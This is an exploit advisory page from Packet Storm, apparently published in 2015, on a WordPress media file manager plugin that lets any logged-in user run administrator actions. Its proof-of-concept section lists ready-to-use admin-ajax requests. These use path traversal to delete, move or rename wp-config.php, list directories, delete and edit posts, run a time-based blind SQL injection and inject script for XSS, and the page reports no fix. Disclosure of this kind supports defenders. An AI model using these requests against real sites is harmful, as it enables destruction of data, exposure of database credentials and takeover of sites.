exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection
Posted May 14, 2015
Authored by Evex

WordPress Media File Manager Advanced plugin versions 1.1.5 and below suffer from cross site scripting, various modification, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 4166675e925816acdce6d734916fadfe5a205ce3a81f8404d06202ad9247bc71

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Change Mirror Download
Description

"media-file-manager-advanced" suffers from executing administrator actions
by any authenticated user due to weak permissions checking.
an attacker can delete/update posts, Creating/Removing/Listing Directories,
Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site
Scripting.

Homepage

https://wordpress.org/plugins/media-file-manager-advanced/

Affected Version

<= 1.1.5

Description

Vulnerability Scope


LFD,SQL,XSS,Site Ruining and Changing of Content.

Authorization Required

User

Proof of Concept


Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php


Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt

Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Fix

No Fix Available at The Moment.

Time line

Notified Vendor - No Reply
Publish Disclosure
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close